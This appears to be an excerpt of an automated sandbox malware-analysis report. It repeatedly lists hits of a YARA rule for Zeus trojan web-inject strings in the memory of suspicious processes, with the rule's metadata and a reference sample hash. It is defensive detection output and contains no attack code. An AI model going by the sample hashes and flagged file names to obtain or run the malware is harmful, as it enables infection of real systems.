Source: 00000002.00000003.1321020929.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2064310969.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2144407040.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2139736993.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2106030537.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145118910.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2148806310.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2148998484.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2092705470.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2144869622.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2103159586.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2148222481.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145950439.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2143582018.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2130882099.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145767072.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1318727770.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2110805717.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: Z8eHwAvqAh.exe PID: 7836, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 7908, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7448, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
